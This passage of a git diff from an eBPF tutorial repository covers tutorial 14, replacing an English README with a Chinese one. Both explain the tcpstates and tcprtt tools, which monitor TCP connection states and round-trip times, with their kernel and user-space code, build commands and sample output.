ctx->oldstate; + event.newstate = ctx->newstate; + event.family = family; + event.sport = sport; + event.dport = dport; + bpf_get_current_comm(&event.task, sizeof(event.task)); + + if (family == AF_INET) { + bpf_probe_read_kernel(&event.saddr, sizeof(event.saddr), &sk->__sk_common.skc_rcv_saddr); + bpf_probe_read_kernel(&event.daddr, sizeof(event.daddr), &sk->__sk_common.skc_daddr); + } else { /* family == AF_INET6 */ + bpf_probe_read_kernel(&event.saddr, sizeof(event.saddr), &sk->__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32); + bpf_probe_read_kernel(&event.daddr, sizeof(event.daddr), &sk->__sk_common.skc_v6_daddr.in6_u.u6_addr32); + } + + bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &event, sizeof(event)); + + if (ctx->newstate == TCP_CLOSE) + bpf_map_delete_elem(×tamps, &sk); + else + bpf_map_update_elem(×tamps, &sk, &ts, BPF_ANY); + + return 0; +} +``` + +`tcpstates`主要依赖于 eBPF 的 Tracepoints 来捕获 TCP 连接的状态变化,从而跟踪 TCP 连接在每个状态下的停留时间。 + +### 定义 BPF Maps + +在`tcpstates`程序中,首先定义了几个 BPF Maps,它们是 eBPF 程序和用户态程序之间交互的主要方式。`sports`和`dports`分别用于存储源端口和目标端口,用于过滤 TCP 连接;`timestamps`用于存储每个 TCP 连接的时间戳,以计算每个状态的停留时间;`events`则是一个 perf_event 类型的 map,用于将事件数据发送到用户态。 + +### 追踪 TCP 连接状态变化 + +程序定义了一个名为`handle_set_state`的函数,该函数是一个 tracepoint 类型的程序,它将被挂载到`sock/inet_sock_set_state`这个内核 tracepoint 上。每当 TCP 连接状态发生变化时,这个 tracepoint 就会被触发,然后执行`handle_set_state`函数。 + +在`handle_set_state`函数中,首先通过一系列条件判断确定是否需要处理当前的 TCP 连接,然后从`timestamps`map 中获取当前连接的上一个时间戳,然后计算出停留在当前状态的时间。接着,程序将收集到的数据放入一个 event 结构体中,并通过`bpf_perf_event_output`函数将该 event 发送到用户态。 + +### 更新时间戳 + +最后,根据 TCP 连接的新状态,程序将进行不同的操作:如果新状态为 TCP_CLOSE,表示连接已关闭,程序将从`timestamps`map 中删除该连接的时间戳;否则,程序将更新该连接的时间戳。 + +用户态的部分主要是通过 libbpf 来加载 eBPF 程序,然后通过 perf_event 来接收内核中的事件数据: + +```c +static void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) { + char ts[32], saddr[26], daddr[26]; + struct event* e = data; + struct tm* tm; + int family; + time_t t; + + if (emit_timestamp) { + time(&t); + tm = localtime(&t); + strftime(ts, sizeof(ts), "%H:%M:%S", tm); + printf("%8s ", ts); + } + + inet_ntop(e->family, &e->saddr, saddr, sizeof(saddr)); + inet_ntop(e->family, &e->daddr, daddr, sizeof(daddr)); + if (wide_output) { + family = e->family == AF_INET ? 4 : 6; + printf( + "%-16llx %-7d %-16s %-2d %-26s %-5d %-26s %-5d %-11s -> %-11s " + "%.3f\n", + e->skaddr, e->pid, e->task, family, saddr, e->sport, daddr, + e->dport, tcp_states[e->oldstate], tcp_states[e->newstate], + (double)e->delta_us / 1000); + } else { + printf( + "%-16llx %-7d %-10.10s %-15s %-5d %-15s %-5d %-11s -> %-11s %.3f\n", + e->skaddr, e->pid, e->task, saddr, e->sport, daddr, e->dport, + tcp_states[e->oldstate], tcp_states[e->newstate], + (double)e->delta_us / 1000); + } +} +``` + +`handle_event`就是这样一个回调函数,它会被 perf_event 调用,每当内核有新的事件到达时,它就会处理这些事件。 + +在`handle_event`函数中,我们首先通过`inet_ntop`函数将二进制的 IP 地址转换成人类可读的格式,然后根据是否需要输出宽格式,分别打印不同的信息。这些信息包括了事件的时间戳、源 IP 地址、源端口、目标 IP 地址、目标端口、旧状态、新状态以及在旧状态停留的时间。 + +这样,用户就可以清晰地看到 TCP 连接状态的变化,以及每个状态的停留时间,从而帮助他们诊断网络问题。 + +总结起来,用户态部分的处理主要涉及到了以下几个步骤: + +1. 使用 libbpf 加载并运行 eBPF 程序。 +2. 设置回调函数来接收内核发送的事件。 +3. 处理接收到的事件,将其转换成人类可读的格式并打印。 + +以上就是`tcpstates`程序用户态部分的主要实现逻辑。通过这一章的学习,你应该已经对如何在用户态处理内核事件有了更深入的理解。在下一章中,我们将介绍更多关于如何使用 eBPF 进行网络监控的知识。 + +### tcprtt + +在本章节中,我们将分析`tcprtt` eBPF 程序的内核态代码。`tcprtt`是一个用于测量 TCP 往返时间(Round Trip Time, RTT)的程序,它将 RTT 的信息统计到一个 histogram 中。 + +```c + +/// @sample {"interval": 1000, "type" : "log2_hist"} +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, u64); + __type(value, struct hist); +} hists SEC(".maps"); + +static struct hist zero; + +SEC("fentry/tcp_rcv_established") +int BPF_PROG(tcp_rcv, struct sock *sk) +{ + const struct inet_sock *inet = (struct inet_sock *)(sk); + struct tcp_sock *ts; + struct hist *histp; + u64 key, slot; + u32 srtt; + + if (targ_sport && targ_sport != inet->inet_sport) + return 0; + if (targ_dport && targ_dport != sk->__sk_common.skc_dport) + return 0; + if (targ_saddr && targ_saddr != inet->inet_saddr) + return 0; + if (targ_daddr && targ_daddr != sk->__sk_common.skc_daddr) + return 0; + + if (targ_laddr_hist) + key = inet->inet_saddr; + else if (targ_raddr_hist) + key = inet->sk.__sk_common.skc_daddr; + else + key = 0; + histp = bpf_map_lookup_or_try_init(&hists, &key, &zero); + if (!histp) + return 0; + ts = (struct tcp_sock *)(sk); + srtt = BPF_CORE_READ(ts, srtt_us) >> 3; + if (targ_ms) + srtt /= 1000U; + slot = log2l(srtt); + if (slot >= MAX_SLOTS) + slot = MAX_SLOTS - 1; + __sync_fetch_and_add(&histp->slots[slot], 1); + if (targ_show_ext) { + __sync_fetch_and_add(&histp->latency, srtt); + __sync_fetch_and_add(&histp->cnt, 1); + } + return 0; +} +``` + +首先,我们定义了一个 hash 类型的 eBPF map,名为`hists`,它用来存储 RTT 的统计信息。在这个 map 中,键是 64 位整数,值是一个`hist`结构,这个结构包含了一个数组,用来存储不同 RTT 区间的数量。 + +接着,我们定义了一个 eBPF 程序,名为`tcp_rcv`,这个程序会在每次内核中处理 TCP 收包的时候被调用。在这个程序中,我们首先根据过滤条件(源/目标 IP 地址和端口)对 TCP 连接进行过滤。如果满足条件,我们会根据设置的参数选择相应的 key(源 IP 或者目标 IP 或者 0),然后在`hists` map 中查找或者初始化对应的 histogram。 + +接下来,我们读取 TCP 连接的`srtt_us`字段,这个字段表示了平滑的 RTT 值,单位是微秒。然后我们将这个 RTT 值转换为对数形式,并将其作为 slot 存储到 histogram 中。 + +如果设置了`show_ext`参数,我们还会将 RTT 值和计数器累加到 histogram 的`latency`和`cnt`字段中。 + +通过以上的处理,我们可以对每个 TCP 连接的 RTT 进行统计和分析,从而更好地理解网络的性能状况。 + +总结起来,`tcprtt` eBPF 程序的主要逻辑包括以下几个步骤: + +1. 根据过滤条件对 TCP 连接进行过滤。 +2. 在`hists` map 中查找或者初始化对应的 histogram。 +3. 读取 TCP 连接的`srtt_us`字段,并将其转换为对数形式,存储到 histogram 中。 +4. 如果设置了`show_ext`参数,将 RTT 值和计数器累加到 histogram 的`latency`和`cnt`字段中。 + +tcprtt 挂载到了内核态的 tcp_rcv_established 函数上: + +```c +void tcp_rcv_established(struct sock *sk, struct sk_buff *skb); +``` + +这个函数是在内核中处理TCP接收数据的主要函数,主要在TCP连接处于`ESTABLISHED`状态时被调用。这个函数的处理逻辑包括一个快速路径和一个慢速路径。快速路径在以下几种情况下会被禁用: + +- 我们宣布了一个零窗口 - 零窗口探测只能在慢速路径中正确处理。 +- 收到了乱序的数据包。 +- 期待接收紧急数据。 +- 没有剩余的缓冲区空间。 +- 接收到了意外的TCP标志/窗口值/头部长度(通过检查TCP头部与预设标志进行检测)。 +- 数据在两个方向上都在传输。快速路径只支持纯发送者或纯接收者(这意味着序列号或确认值必须保持不变)。 +- 接收到了意外的TCP选项。 + +当这些条件不满足时,它会进入一个标准的接收处理过程,这个过程遵循RFC793来处理所有情况。前三种情况可以通过正确的预设标志设置来保证,剩下的情况则需要内联检查。当一切都正常时,快速处理过程会在`tcp_data_queue`函数中被开启。 + +## 编译运行 + +对于 tcpstates,可以通过以下命令编译和运行 libbpf 应用: + +```console +$ make +... + BPF .output/tcpstates.bpf.o + GEN-SKEL .output/tcpstates.skel.h + CC .output/tcpstates.o + BINARY tcpstates +$ sudo ./tcpstates +SKADDR PID COMM LADDR LPORT RADDR RPORT OLDSTATE -> NEWSTATE MS +ffff9bf61bb62bc0 164978 node 192.168.88.15 0 52.178.17.2 443 CLOSE -> SYN_SENT 0.000 +ffff9bf61bb62bc0 0 swapper/0 192.168.88.15 41596 52.178.17.2 443 SYN_SENT -> ESTABLISHED 225.794 +ffff9bf61bb62bc0 0 swapper/0 192.168.88.15 41596 52.178.17.2 443 ESTABLISHED -> CLOSE_WAIT 901.454 +ffff9bf61bb62bc0 164978 node 192.168.88.15 41596 52.178.17.2 443 CLOSE_WAIT -> LAST_ACK 0.793 +ffff9bf61bb62bc0 164978 node 192.168.88.15 41596 52.178.17.2 443 LAST_ACK -> LAST_ACK 0.086 +ffff9bf61bb62bc0 228759 kworker/u6 192.168.88.15 41596 52.178.17.2 443 LAST_ACK -> CLOSE 0.193 +ffff9bf6d8ee88c0 229832 redis-serv 0.0.0.0 6379 0.0.0.0 0 CLOSE -> LISTEN 0.000 +ffff9bf6d8ee88c0 229832 redis-serv 0.0.0.0 6379 0.0.0.0 0 LISTEN -> CLOSE 1.763 +ffff9bf7109d6900 88750 node 127.0.0.1 39755 127.0.0.1 50966 ESTABLISHED -> FIN_WAIT1 0.000 +``` + +对于 tcprtt,我们可以使用 eunomia-bpf 编译运行这个例子: + +Compile: + +```shell +docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest +``` + +或者 + +```console +$ ecc tcprtt.bpf.c tcprtt.h +Compiling bpf object... +Generating export types... +Packing ebpf object and config into package.json... +``` + +运行: + +```console +$ sudo ecli run package.json -h +A simple eBPF program + + +Usage: package.json [OPTIONS] + +Options: + --verbose Whether to show libbpf debug information + --targ_laddr_hist Set value of `bool` variable targ_laddr_hist + --targ_raddr_hist Set value of `bool` variable targ_raddr_hist + --targ_show_ext Set value of `bool` variable targ_show_ext + --targ_sport Set value of `__u16` variable targ_sport + --targ_dport Set value of `__u16` variable targ_dport + --targ_saddr Set value of `__u32` variable targ_saddr + --targ_daddr Set value of `__u32` variable targ_daddr + --targ_ms Set value of `bool` variable targ_ms + -h, --help Print help + -V, --version Print version + +Built with eunomia-bpf framework. +See https://github.com/eunomia-bpf/eunomia-bpf for more information. + +$ sudo ecli run package.json +key = 0 +latency = 0 +cnt = 0 + + (unit) : count distribution + 0 -> 1 : 0 | | + 2 -> 3 : 0 | | + 4 -> 7 : 0 | | + 8 -> 15 : 0 | | + 16 -> 31 : 0 | | + 32 -> 63 : 0 | | + 64 -> 127 : 0 | | + 128 -> 255 : 0 | | + 256 -> 511 : 0 | | + 512 -> 1023 : 4 |******************** | + 1024 -> 2047 : 1 |***** | + 2048 -> 4095 : 0 | | + 4096 -> 8191 : 8 |****************************************| + +key = 0 +latency = 0 +cnt = 0 + + (unit) : count distribution + 0 -> 1 : 0 | | + 2 -> 3 : 0 | | + 4 -> 7 : 0 | | + 8 -> 15 : 0 | | + 16 -> 31 : 0 | | + 32 -> 63 : 0 | | + 64 -> 127 : 0 | | + 128 -> 255 : 0 | | + 256 -> 511 : 0 | | + 512 -> 1023 : 11 |*************************** | + 1024 -> 2047 : 1 |** | + 2048 -> 4095 : 0 | | + 4096 -> 8191 : 16 |****************************************| + 8192 -> 16383 : 4 |********** | +``` + +完整源代码: + +- + +参考资料: + +- [tcpstates](https://github.com/iovisor/bcc/blob/master/tools/tcpstates_example.txt) +- [tcprtt](https://github.com/iovisor/bcc/blob/master/tools/tcprtt.py) +- [libbpf-tools/tcpstates]() + +## 总结 + +通过本篇 eBPF 入门实践教程,我们学习了如何使用tcpstates和tcprtt这两个 eBPF 示例程序,监控和分析 TCP 的连接状态和往返时间。我们了解了tcpstates和tcprtt的工作原理和实现方式,包括如何使用 BPF map 存储数据,如何在 eBPF 程序中获取和处理 TCP 连接信息,以及如何在用户态应用程序中解析和显示 eBPF 程序收集的数据。 + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容。 diff --git a/src/14-tcpstates/README_en.md b/src/14-tcpstates/README_en.md deleted file mode 100644 index 189474d..0000000 --- a/src/14-tcpstates/README_en.md +++ /dev/null @@ -1,408 +0,0 @@ -# eBPF Tutorial by Example 14: Recording TCP Connection Status and TCP RTT - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or changing the kernel source code. - -In this article of our eBPF Tutorial by Example series, we will introduce two sample programs: `tcpstates` and `tcprtt`. `tcpstates` is used to record the state changes of TCP connections, while `tcprtt` is used to record the Round-Trip Time (RTT) of TCP. - -## `tcprtt` and `tcpstates` - -Network quality is crucial in the current Internet environment. There are many factors that affect network quality, including hardware, network environment, and the quality of software programming. To help users better locate network issues, we introduce the tool `tcprtt`. `tcprtt` can monitor the Round-Trip Time of TCP connections, evaluate network quality, and help users identify potential problems. - -When a TCP connection is established, `tcprtt` automatically selects the appropriate execution function based on the current system conditions. In the execution function, `tcprtt` collects various basic information of the TCP connection, such as source address, destination address, source port, destination port, and time elapsed, and updates this information to a histogram-like BPF map. After the execution is completed, `tcprtt` presents the collected information graphically to users through user-mode code. - -`tcpstates` is a tool specifically designed to track and print changes in TCP connection status. It can display the duration of TCP connections in each state, measured in milliseconds. For example, for a single TCP session, `tcpstates` can print output similar to the following: - -```sh -SKADDR C-PID C-COMM LADDR LPORT RADDR RPORT OLDSTATE -> NEWSTATE MS -ffff9fd7e8192000 22384 curl 100.66.100.185 0 52.33.159.26 80 CLOSE -> SYN_SENT 0.000 -ffff9fd7e8192000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 SYN_SENT -> ESTABLISHED 1.373 -ffff9fd7e8192000 22384 curl 100.66.100.185 63446 52.33.159.26 80 ESTABLISHED -> FIN_WAIT1 176.042 -ffff9fd7e8192000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 FIN_WAIT1 -> FIN_WAIT2 0.536 -ffff9fd7e8192000 0 swapper/5 100.66.100.185 63446 52.33.159.26 80 FIN_WAIT2 -> CLOSE 0.006 -``` - -In the above output, the most time is spent in the ESTABLISHED state, which indicates that the connection has been established and data transmission is in progress. The transition from this state to the FIN_WAIT1 state (the beginning of connection closure) took 176.042 milliseconds. - -In our upcoming tutorials, we will delve deeper into these two tools, explaining their implementation principles, and hopefully, these contents will help you in your work with eBPF for network and performance analysis. - -## tcpstate eBPF code - -Due to space constraints, here we mainly discuss and analyze the corresponding eBPF kernel-mode code implementation. The following is the eBPF code for tcpstate: - -```c -const volatile bool filter_by_sport = false; -const volatile bool filter_by_dport = false; -const volatile short target_family = 0; - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - __type(key, __u16); - __type(value, __u16); -} sports SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - ... -```__type(key, __u16); - __type(value, __u16); -} dports SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - __type(key, struct sock *); - __type(value, __u64); -} timestamps SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); - __uint(key_size, sizeof(__u32)); - __uint(value_size, sizeof(__u32)); -} events SEC(".maps"); - -SEC("tracepoint/sock/inet_sock_set_state") -int handle_set_state(struct trace_event_raw_inet_sock_set_state *ctx) -{ - struct sock *sk = (struct sock *)ctx->skaddr; - __u16 family = ctx->family; - __u16 sport = ctx->sport; - __u16 dport = ctx->dport; - __u64 *tsp, delta_us, ts; - struct event event = {}; - - if (ctx->protocol != IPPROTO_TCP) - return 0; - - if (target_family && target_family != family) - return 0; - - if (filter_by_sport && !bpf_map_lookup_elem(&sports, &sport)) - return 0; - - if (filter_by_dport && !bpf_map_lookup_elem(&dports, &dport)) - return 0; - - tsp = bpf_map_lookup_elem(×tamps, &sk); - ts = bpf_ktime_get_ns(); - if (!tsp) - delta_us = 0; - else - delta_us = (ts - *tsp) / 1000; - - event.skaddr = (__u64)sk; - event.ts_us = ts / 1000; - event.delta_us = delta_us; - event.pid = bpf_get_current_pid_tgid() >> 32; - event.oldstate = ctx->oldstate; - event.newstate = ctx->newstate; - event.family = family; - event.sport = sport; - event.dport = dport; - bpf_get_current_comm(&event.task, sizeof(event.task)); - - if (family == AF_INET) { - bpf_probe_read_kernel(&event.saddr, sizeof(event.saddr), &sk->__sk_common.skc_rcv_saddr); - bpf_probe_read_kernel(&event.daddr, sizeof(event.daddr), &sk->__sk_common.skc_daddr); - } else { /* family == AF_INET6 */ - bpf_probe_read_kernel(&event.saddr, sizeof(event.saddr), &sk->__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32); - bpf_probe_read_kernel(&event.daddr, sizeof(event.daddr), &sk->__sk_common.skc_v6_daddr.in6_u.u6_addr32); - } - bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &event, sizeof(event)); - - if (ctx->newstate == TCP_CLOSE) - bpf_map_delete_elem(×tamps, &sk); - else - bpf_map_update_elem(×tamps, &sk, &ts, BPF_ANY); - - return 0; -} -``` - -The `tcpstates` program relies on eBPF Tracepoints to capture the state changes of TCP connections, in order to track the time spent in each state of the TCP connection. - -### Define BPF Maps - -In the `tcpstates` program, several BPF Maps are defined, which are the primary way of interaction between the eBPF program and the user-space program. `sports` and `dports` are used to store the source and destination ports for filtering TCP connections; `timestamps` is used to store the timestamps for each TCP connection to calculate the time spent in each state; `events` is a map of type `perf_event`, used to send event data to the user-space. - -### Trace TCP Connection State Changes - -The program defines a function called `handle_set_state`, which is a program of type tracepoint and is mounted on the `sock/inet_sock_set_state` kernel tracepoint. Whenever the TCP connection state changes, this tracepoint is triggered and the `handle_set_state` function is executed. - -In the `handle_set_state` function, it first determines whether the current TCP connection needs to be processed through a series of conditional judgments, then retrieves the previous timestamp of the current connection from the `timestamps` map, and calculates the time spent in the current state. Then, the program places the collected data in an event structure and sends the event to the user-space using the `bpf_perf_event_output` function. - -### Update Timestamps - -Finally, based on the new state of the TCP connection, the program performs different operations: if the new state is TCP_CLOSE, it means the connection has been closed and the program deletes the timestamp of that connection from the `timestamps` map; otherwise, the program updates the timestamp of the connection. - -## User-Space Processing for tcpstate - -The user-space part is mainly about loading the eBPF program using libbpf and receiving event data from the kernel using perf_event: - -```c -static void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) { - char ts[32], saddr[26], daddr[26]; - struct event* e = data; - struct tm* tm; - int family; - time_t t; - - if (emit_timestamp) { - time(&t); - tm = localtime(&t); - strftime(ts, sizeof(ts), "%H:%M:%S", tm); - printf("%8s ", ts); - } - - inet_ntop(e->family, &e->saddr, saddr, sizeof(saddr)); - inet_ntop(e->family, &e->daddr, daddr, sizeof(daddr)); - if (wide_output) { - family = e->family == AF_INET ? 4 : 6; - printf( - "%-16llx %-7d %-16s %-2d %-26s %-5d %-26s %-5d %-11s -> %-11s " - "%.3f\n", - e->skaddr, e->pid, e->task, family, saddr, e->sport, daddr, - e->dport, tcp_states[e->oldstate], tcp_states[e->newstate], - (double)e->delta_us / 1000); - } else { - printf( - "%-16llx %-7d %-10.10s %-15s %-5d %-15s %-5d %-11s -> %-11s %.3f\n", - ... -``` - -handle_event` is a callback function that is called by perf_event. It handles new events that arrive in the kernel. - -In the `handle_event` function, we first use the `inet_ntop` function to convert the binary IP address to a human-readable format. Then, based on whether the wide format is needed or not, we print different information. This information includes the timestamp of the event, source IP address, source port, destination IP address, destination port, old state, new state, and the time spent in the old state. - -This allows users to see the changes in TCP connection states and the duration of each state, helping them diagnose network issues. - -In summary, the user-space part of the processing involves the following steps: - -1. Use libbpf to load and run the eBPF program. -2. Set up a callback function to receive events sent by the kernel. -3. Process the received events, convert them into a human-readable format, and print them. - -The above is the main implementation logic of the user-space part of the `tcpstates` program. Through this chapter, you should have gained a deeper understanding of how to handle kernel events in user space. In the next chapter, we will introduce more knowledge about using eBPF for network monitoring. - -### tcprtt kernel eBPF code - -In this section, we will analyze the kernel BPF code of the `tcprtt` eBPF program. `tcprtt` is a program used to measure TCP Round Trip Time (RTT) and stores the RTT information in a histogram. - -```c -/// @sample {"interval": 1000, "type" : "log2_hist"} -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - __type(key, u64); - __type(value, struct hist); -} hists SEC(".maps"); - -static struct hist zero; - -SEC("fentry/tcp_rcv_established") -int BPF_PROG(tcp_rcv, struct sock *sk) -{ - const struct inet_sock *inet = (struct inet_sock *)(sk); - struct tcp_sock *ts; - struct hist *histp; - u64 key, slot; - u32 srtt; - - if (targ_sport && targ_sport != inet->inet_sport) - return 0; - if (targ_dport && targ_dport != sk->__sk_common.skc_dport) - return 0; - if (targ_saddr && targ_saddr != inet->inet_saddr) - return 0; - if (targ_daddr && targ_daddr != sk->__sk_common.skc_daddr) - return 0; - - if (targ_laddr_hist) - key = inet->inet_saddr; - else if (targ_raddr_hist) - key = inet->sk.__sk_common.skc_daddr; - else - key = 0; - histp = bpf_map_lookup_or_try_init(&hists, &key, &zero); - if (!histp) - return 0; - ts = (struct tcp_sock *)(sk); - srtt = BPF_CORE_READ(ts, srtt_us) >> 3; - if (targ_ms) - srtt /= 1000U; - slot = log2l(srtt); - if (slot >= MAX_SLOTS) - slot = MAX_SLOTS - 1; - __sync_fetch_and_add(&histp->slots[slot], 1); - if (targ_show_ext) { - __sync_fetch_and_add(&histp->latency, srtt); - __sync_fetch_and_add(&histp->cnt, 1); - } - return 0; -} -``` - -The code above declares a map called `hists`, which is a hash map used to store the histogram data. The `hists` map has a maximum number of entries defined as `MAX_ENTRIES`. - -The function `BPF_PROG(tcp_rcv, struct sock *sk)` is the entry point of the eBPF program for handling the `tcp_rcv_established` event. Within this function, the program retrieves various information from the network socket and checks if filtering conditions are met. Then, it performs operations on the histogram data structure. Finally, the program calculates the slot for the RTT value and updates the histogram accordingly. - -This is the main code logic of the `tcprtt` eBPF program in kernel mode. The eBPF program measures the RTT of TCP connections and maintains a histogram to collect and analyze the RTT data.Instructions: - -First, we define a hash type eBPF map called `hists`, which is used to store statistics information about RTT. In this map, the key is a 64-bit integer, and the value is a `hist` structure that contains an array to store the count of different RTT intervals. - -Next, we define an eBPF program called `tcp_rcv` which will be called every time a TCP packet is received in the kernel. In this program, we first filter TCP connections based on filtering conditions (source/destination IP address and port). If the conditions are met, we select the corresponding key (source IP, destination IP, or 0) based on the set parameters, and then look up or initialize the corresponding histogram in the `hists` map. - -Then, we read the `srtt_us` field of the TCP connection, which represents the smoothed RTT value in microseconds. We convert this RTT value to a logarithmic form and store it as a slot in the histogram. - -If the `show_ext` parameter is set, we also increment the RTT value and the counter in the `latency` and `cnt` fields of the histogram. - -With the above processing, we can analyze and track the RTT of each TCP connection to better understand the network performance. - -In summary, the main logic of the `tcprtt` eBPF program includes the following steps: - -1. Filter TCP connections based on filtering conditions. -2. Look up or initialize the corresponding histogram in the `hists` map. -3. Read the `srtt_us` field of the TCP connection, convert it to a logarithmic form, and store it in the histogram. -4. If the `show_ext` parameter is set, increment the RTT value and the counter in the `latency` and `cnt` fields of the histogram. - -`tcprtt` is attached to the kernel's `tcp_rcv_established` function: - -```c -void tcp_rcv_established(struct sock *sk, struct sk_buff *skb); -``` - -This function is the main function in the kernel for processing received TCP data and is called when a TCP connection is in the `ESTABLISHED` state. The processing logic of this function includes a fast path and a slow path. The fast path is disabled in the following cases: - -- We have advertised a zero window - zero window probing can only be handled correctly in the slow path. -- Out-of-order data packets received. -- Expecting to receive urgent data. -- No remaining buffer space. -- Received unexpected TCP flags/window values/header lengths (detected by checking TCP header against the expected flags). -- Data is being transmitted in both directions. The fast path only supports pure senders or pure receivers (meaning the sequence number or acknowledgement value must remain unchanged). -- Received unexpected TCP options. - -When these conditions are not met, it enters a standard receive processing, which follows RFC 793 to handle all cases. The first three cases can be ensured by setting the correct expected flags, while the remaining cases require inline checks. When everything is normal, the fast processing path is invoked in the `tcp_data_queue` function. - -## Compilation and Execution - -For `tcpstates`, you can compile and run the libbpf application with the following command: - -```console -$ make -... - BPF .output/tcpstates.bpf.o - GEN-SKEL .output/tcpstates.skel.h - CC .output/tcpstates.o - BINARY tcpstates -$ sudo ./tcpstates -SKADDR PID COMM LADDR LPORT RADDR RPORT OLDSTATE -> NEWSTATE MS -ffff9bf61bb62bc0 164978 node 192.168.88.15 0 52.178.17.2 443 CLOSE -> SYN_SENT 0.000 -ffff9bf61bb62bc0 0 swapper/0 192.168.88.15 41596 52.178.17.2 443 SYN_SENT -> ESTABLISHED 225.794". -"ffff9bf61bb62bc0 0 swapper/0 192.168.88.15 41596 52.178.17.2 443 ESTABLISHED -> CLOSE_WAIT 901.454 -ffff9bf61bb62bc0 164978 node 192.168.88.15 41596 52.178.17.2 443 CLOSE_WAIT -> LAST_ACK 0.793 -ffff9bf61bb62bc0 164978 node 192.168.88.15 41596 52.178.17.2 443 LAST_ACK -> LAST_ACK 0.086 -ffff9bf61bb62bc0 228759 kworker/u6 192.168.88.15 41596 52.178.17.2 443 LAST_ACK -> CLOSE 0.193 -ffff9bf6d8ee88c0 229832 redis-serv 0.0.0.0 6379 0.0.0.0 0 CLOSE -> LISTEN 0.000 -ffff9bf6d8ee88c0 229832 redis-serv 0.0.0.0 6379 0.0.0.0 0 LISTEN -> CLOSE 1.763 -ffff9bf7109d6900 88750 node 127.0.0.1 39755 127.0.0.1 50966 ESTABLISHED -> FIN_WAIT1 0.000 -``` - -For tcprtt, we can use eunomia-bpf to compile and run this example: - -Compile: - -```shell -docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest -``` - -Or - -```console -$ ecc tcprtt.bpf.c tcprtt.h -Compiling bpf object... -Generating export types... -Packing ebpf object and config into package.json... -``` - -Run: - -```console -$ sudo ecli run package.json -h -A simple eBPF program - -Usage: package.json [OPTIONS] - -Options: - --verbose Whether to show libbpf debug information - --targ_laddr_hist Set value of `bool` variable targ_laddr_hist - --targ_raddr_hist Set value of `bool` variable targ_raddr_hist - --targ_show_ext Set value of `bool` variable targ_show_ext - --targ_sport Set value of `__u16` variable targ_sport - --targ_dport Set value of `__u16` variable targ_dport - --targ_saddr Set value of `__u32` variable targ_saddr - --targ_daddr Set value of `__u32` variable targ_daddr - --targ_ms Set value of `bool` variable targ_ms - -h, --help Print help - -V, --version Print version - -Built with eunomia-bpf framework.". -```See https://github.com/eunomia-bpf/eunomia-bpf for more information. - -$ sudo ecli run package.json -key = 0 -latency = 0 -cnt = 0 - - (unit) : count distribution - 0 -> 1 : 0 | | - 2 -> 3 : 0 | | - 4 -> 7 : 0 | | - 8 -> 15 : 0 | | - 16 -> 31 : 0 | | - 32 -> 63 : 0 | | - 64 -> 127 : 0 | | - 128 -> 255 : 0 | | - 256 -> 511 : 0 | | - 512 -> 1023 : 4 |******************** | - 1024 -> 2047 : 1 |***** | - 2048 -> 4095 : 0 | | - 4096 -> 8191 : 8 |****************************************| - -key = 0 -latency = 0 -cnt = 0 - - (unit) : count distribution - 0 -> 1 : 0 | | - 2 -> 3 : 0 | | - 4 -> 7 : 0 | | - 8 -> 15 : 0 | | - 16 -> 31 : 0 | | - 32 -> 63 : 0 | | - 64 -> 127 : 0 | | - 128 -> 255 : 0 | | - 256 -> 511 : 0 | |512 -> 1023 : 11 |*************************** | - 1024 -> 2047 : 1 |** | - 2048 -> 4095 : 0 | | - 4096 -> 8191 : 16 |****************************************| - 8192 -> 16383 : 4 |********** | -``` - -Complete source code: - -- - -References: - -- [tcpstates](https://github.com/iovisor/bcc/blob/master/tools/tcpstates_example.txt) -- [tcprtt](https://github.com/iovisor/bcc/blob/master/tools/tcprtt.py) -- [libbpf-tools/tcpstates]() - -## Summary - -In this eBPF introductory tutorial, we learned how to use the tcpstates and tcprtt eBPF example programs to monitor and analyze the connection states and round-trip time of TCP. We understood the working principles and implementation methods of tcpstates and tcprtt, including how to store data using BPF maps, how to retrieve and process TCP connection information in eBPF programs, and how to parse and display the data collected by eBPF programs in user-space applications. - -If you would like to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials. The upcoming tutorials will further explore advanced features of eBPF, and we will continue to share more content about eBPF development practices. - -> The original link of this article: diff --git a/src/15-javagc/README.md b/src/15-javagc/README.md index 7dd1e27..1b76e18 100644 --- a/src/15-javagc/README.md +++ b/src/15-javagc/README.md @@ -1,16 +1,16 @@ -# eBPF 入门实践教程十五:使用 USDT 捕获用户态 Java GC 事件耗时 +# eBPF Tutorial by Example 15: Capturing User-Space Java GC Duration Using USDT -eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。这个特性使得 eBPF 能够提供极高的灵活性和性能,使其在网络和系统性能分析方面具有广泛的应用。此外,eBPF 还支持使用 USDT (用户级静态定义跟踪点) 捕获用户态的应用程序行为。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool widely used in the Linux kernel. eBPF allows developers to dynamically 